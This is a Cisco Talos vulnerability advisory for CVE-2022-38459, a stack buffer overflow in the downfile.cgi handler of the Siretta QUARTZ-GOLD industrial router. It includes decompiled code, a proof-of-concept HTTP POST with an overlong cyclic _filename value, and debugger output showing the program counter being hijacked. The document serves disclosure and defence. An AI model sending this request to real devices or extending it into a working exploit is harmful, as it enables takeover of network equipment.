CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
50.2%
CVE-2022-38459
A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/
7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-120 - Buffer Copy without Checking Size of Input (βClassic Buffer Overflowβ)
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.
The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.
Following the API to download a previously uploaded file:
void downfile.cgi(void)
{
[...]
_filename_param = (char *)webcgi_safeget("_filename"); [1]
filename = "";
if (_filename_param != (char *)0x0) {
filename = _filename_param;
}
[... calculate base_folder ...]
if (*filename != '\0') {
sprintf(buff,"Content-Disposition:attachment;filename=\"%s\"",(char)filename);
send_header(200,buff,"application/tomato-binary-file",0);
sprintf(buff,"%s/%s",base_folder,filename); [2]
do_file(buff); [3]
}
return;
}
The downfile.cgi
expects one parameter called _filename
that represents the filename of the desired file to be downloaded. At [1]
the uploaded parameter is taken and then used at [2]
. The function used at [2]
is a sprintf
, which does not take into consideration the size of the buffer. If the _filename
parameter is longer than a certain length, the instruction at [2]
would cause a stack-based buffer overflow that could led to remote code execution.
$r0 : 0x0
$r1 : 0x0
$r2 : 0x7ef38c60 β "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
$r3 : 0x2000
$r4 : 0x61666b61 ("akfa"?)
$r5 : 0x61676b61 ("akga"?)
$r6 : 0x61686b61 ("akha"?)
$r7 : 0x1
$r8 : 0x0
$r9 : 0x0001e658 β "downfile.cgi"
$r10 : 0x0001dbac β 0x0001e658 β "downfile.cgi"
$r11 : 0x7ef3b784 β "admin"
$r12 : 0x2ae5573c β 0x2ae41ac4 β <_pthread_cleanup_pop_restore+0> push {r3, lr}
$sp : 0x7ef39070 β "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
$lr : 0x2ae3bb30 β <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}
$pc : 0x61696b60 ("`kia"?)
$cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ stack ββββ
0x7ef39070β+0x0000: "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak" β $sp
0x7ef39074β+0x0004: "akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef39078β+0x0008: "aklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef3907cβ+0x000c: "akmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef39080β+0x0010: "aknaakoaakpaakqaakraaksaaktaak"
0x7ef39084β+0x0014: "akoaakpaakqaakraaksaaktaak"
0x7ef39088β+0x0018: "akpaakqaakraaksaaktaak"
0x7ef3908cβ+0x001c: "akqaakraaksaaktaak"
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ code:arm:THUMB ββββ
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x61696b60
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ threads ββββ
[#0] Id 1, Name: "httpd", stopped 0x61696b60 in ?? (), reason: SIGSEGV
Sending a request like the following:
POST /downfile.cgi HTTP/1.1
Authorization: Basic <a>
Content-Length: 1119
_filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak&_http_id=<the correct tid>
The status at the return address of the downfile.cgi
function would be:
$r0 : 0x0
$r1 : 0x0
$r2 : 0x7ef38c60 β "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
$r3 : 0x2000
$r4 : 0x7ef38c60 β "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
$r5 : 0x00031082 β "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama[...]"
$r6 : 0x0002272b β "/jffs"
$r7 : 0x1
$r8 : 0x0
$r9 : 0x0001e658 β "downfile.cgi"
$r10 : 0x0001dbac β 0x0001e658 β "downfile.cgi"
$r11 : 0x7ef3b784 β "admin"
$r12 : 0x2ae5573c β 0x2ae41ac4 β <_pthread_cleanup_pop_restore+0> push {r3, lr}
$sp : 0x7ef39060 β "akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]"
$lr : 0x2ae3bb30 β <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}
$pc : 0x0000f96c β pop {r4, r5, r6, pc}
$cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ stack ββββ
0x7ef39060β+0x0000: "akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]" β $sp
0x7ef39064β+0x0004: "akgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraak[...]"
0x7ef39068β+0x0008: "akhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaak[...]"
0x7ef3906cβ+0x000c: "akiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef39070β+0x0010: "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef39074β+0x0014: "akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef39078β+0x0018: "aklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef3907cβ+0x001c: "akmaaknaakoaakpaakqaakraaksaaktaak"
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ code:arm:ARM ββββ
0xf960 mov r0, sp
0xf964 bl 0xbbc8
0xf968 add sp, sp, #1024 ; 0x400
β 0xf96c pop {r4, r5, r6, pc}
[!] Cannot disassemble from $PC
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ threads ββββ
[#0] Id 1, Name: "httpd", stopped 0xf96c in ?? (), reason: BREAKPOINT
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ trace ββββ
[#0] 0xf96c β pop {r4, r5, r6, pc}
[#1] 0x2ae3bb30 β free()
So the next instruction will populate the pc
with the fourth dword contained in the stack, so:
gefβ€ hexdump dw $sp
0x7ef39060β+0x0000 0x61666b61
0x7ef39064β+0x0004 0x61676b61
0x7ef39068β+0x0008 0x61686b61
0x7ef3906cβ+0x000c 0x61696b61
[...]
After the pop the pc
will contain the 0x61696b61
value.
2022-10-14 - Initial Vendor Contact
2022-10-20 - Vendor Disclosure
2022-11-24 - Vendor Patch Release
2023-01-26 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.
Vulnerability Reports Next Report
TALOS-2022-1610
Previous Report
TALOS-2022-1609